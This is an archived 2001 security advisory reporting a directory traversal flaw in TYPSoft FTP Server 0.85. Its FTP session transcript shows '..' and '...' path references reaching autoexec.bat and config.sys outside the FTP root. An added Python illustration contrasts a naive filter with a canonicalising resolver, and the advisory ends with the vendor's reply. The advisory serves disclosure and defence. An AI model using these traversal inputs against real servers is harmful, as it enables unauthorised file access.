 
From: joetesta@HUSHMAIL.COM
Date: Wed Feb 28 2001 - 17:27:57 CST


    ----- Begin Hush Signed Message from joetesta@hushmail.com -----

    Vulnerability in TYPSoft FTP Server

        Overview

    TYPSoft FTP Server v0.85 is an FTP server available from
    http://www.webmasterfree.com and http://typsoft.n3.net. A vulnerability
    exists which allows a remote attacker to escape the FTP root directory
    using relative path references (i.e. '..' and '...').

        Details

    The following is an illustration of the problem:

    % ftp localhost
    Connected to xxxxxxxxxx.rh.rit.edu.
    220 TYPSoft FTP Server 0.85 ready...
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog.
    Password:
    230 User jdog logged in.
    ftp> pwd
    257 "/C:/directory/directory/" is current directory.
    ftp> get ../../autoexec.bat
    200 Port command successful.
    150 Opening data connection for ../../autoexec.bat.
    226 Transfer complete.
    ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
    ftp> cd ..
    501 CWD failed. No permission
    ftp> cd ...
    250 CWD command successful. "/C:/directory/directory/.../" is current directory.
    ftp> pwd
    257 "/C:/directory/directory/.../" is current directory.
    ftp> get config.sys
    200 Port command successful.
    150 Opening data connection for config.sys.
    226 Transfer complete.
    ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
    ftp>
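
    The transcript shows why refusing the literal '..' form is not enough: the
    underlying file system also honours other parent references such as '...',
    which DOS-era Windows resolves as two levels up. The following Python is
    added here as an illustration and is not code from the advisory or from
    TYPSoft. It contrasts a hypothetical blacklist filter with a resolver that
    canonicalises every request against the FTP root before any file operation
    is attempted; FTP_ROOT, naive_filter_blocks and resolve_within_root are names
    chosen for this example, and the root value is constructed from the PWD
    output above.

```python
import re

# Constructed value for this example: the transcript reports
# "/C:/directory/directory/" as the FTP root, so the same shape is used.
FTP_ROOT = "/C:/directory/directory"

# A Windows FTP server sees both separators, so split on either.
_SEP = re.compile(r"[\\/]+")


def naive_filter_blocks(requested: str) -> bool:
    """A filter that refuses only the literal '..' segment (hypothetical; not
    TYPSoft's code). It lets 'cd ...' through, and DOS-era Windows resolves
    '...' as two levels up, so the root can still be escaped."""
    return ".." in _SEP.split(requested)


def resolve_within_root(root: str, cwd: str, requested: str):
    """Canonicalise `requested`, interpreted relative to `cwd` (a path below
    `root`, written with a leading '/'), and return the absolute virtual path,
    or None if the result would leave `root`.

    Rules applied segment by segment:
      * '' and '.' are dropped;
      * '..' pops one level and is refused when nothing is left to pop;
      * any other all-dot segment ('...', '....') is refused outright rather
        than interpreted, because Windows has treated it as a parent reference;
      * the verdict is taken on the canonical path the server computed itself,
        never on what the host OS might make of the raw string.
    """
    root = root.rstrip("/\\")
    if requested[:1] in ("/", "\\"):
        start = requested                              # absolute within the root
    else:
        start = cwd.rstrip("/\\") + "/" + requested    # relative to the session cwd
    stack = []
    for seg in _SEP.split(start):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                return None          # attempt to climb above the FTP root
            stack.pop()
            continue
        if set(seg) == {"."}:
            return None              # '...' and longer: refuse, do not guess
        stack.append(seg)
    return root + "/" + "/".join(stack)


if __name__ == "__main__":
    # The requests seen in the transcript, issued from a session at the root,
    # plus one legitimate relative path for contrast.
    for req in ("../../autoexec.bat", "..", "...", "pub/../readme.txt"):
        print(f"{req!r:24} naive blocks: {naive_filter_blocks(req)!s:5} "
              f"resolved: {resolve_within_root(FTP_ROOT, '/', req)}")
```

    Running the block prints one line per request: the naive filter passes
    '...' while the resolver refuses it, and the resolver also refuses
    '../../autoexec.bat' even though the transcript shows the server serving
    it. The design point is that the server decides on a path it normalised
    itself, so a client cannot reach the OS with a spelling the server never
    evaluated.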

        Solution

    > Date: Sat, 24 Feb 2001 01:39:23 -0500
    > Subject: Re: Vulnerability in TYPSoft FTP Server
    > From: TYPSoft <typsoft@altern.org>
    > To: joetesta@hushmail.com
    >
    > Hi
    > I have tried to fix this problem.
    > The test I have made seems to be OK.
    > Thanks for the report
    >
    > Marc
    > TYPSoft

    Unfortunately, I do not have the resources to verify this fix at
    this time. Thus, I urge users to proceed with caution.

        Vendor Status

    TYPSoft was contacted via <typsoft@altern.org> on Wednesday, February
    21, 2001.

        - Joe Testa ( e-mail: joetesta@hushmail.com / AIM: LordSpankatron )

    ----- Begin Hush Signature v1.3 -----
    CCyeaZ11wOzc4By+rx1GtdKkD9gDG1/WAGHJFUhNZz/sgpcfsBCSqSLWjwIoSl8Atqqv
    k83hLlTNlsRS5rzSkS+7yx37hSlR5mwy/2VC0DYd6g8/vMUSp2uQ59wfxZjasWeSx3t/
    sA61/cuAT30osMp9YCCy1i4+/7/ReyGJERQQtQIiLuVvN43EWcMVvTGmDJgOqvLErGVu
    I4seQjpawANb/Nis9zJbKYjbBycaew5xGeZ8d51tyt8It5sO/Pf7+2lKBYinWk7tV75/
    yrkEpVd23MXtn9xW0c+9GiwvUlUTyhKkfQe3crhHxJywTWhbq1MOp5pQMaksAm/87CQc
    y8+ZrbDW8SWKh3ozKiot5CgK4gMd2jSbLJ/IUxY8A2GisMU96GyGUTsC7Jzmng9UG/mK
    YlWtalAbucV/TJgHFyyy9zbmQ4X+TLez8ewrU6hXnOLwuW9K8Pgt1/2O99mdZMoU+Uuf
    g1Obvd2TlDtRwk9MNQcriBktRi03WJIJtomI74GIx5TO
    ----- End Hush Signature v1.3 -----

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools
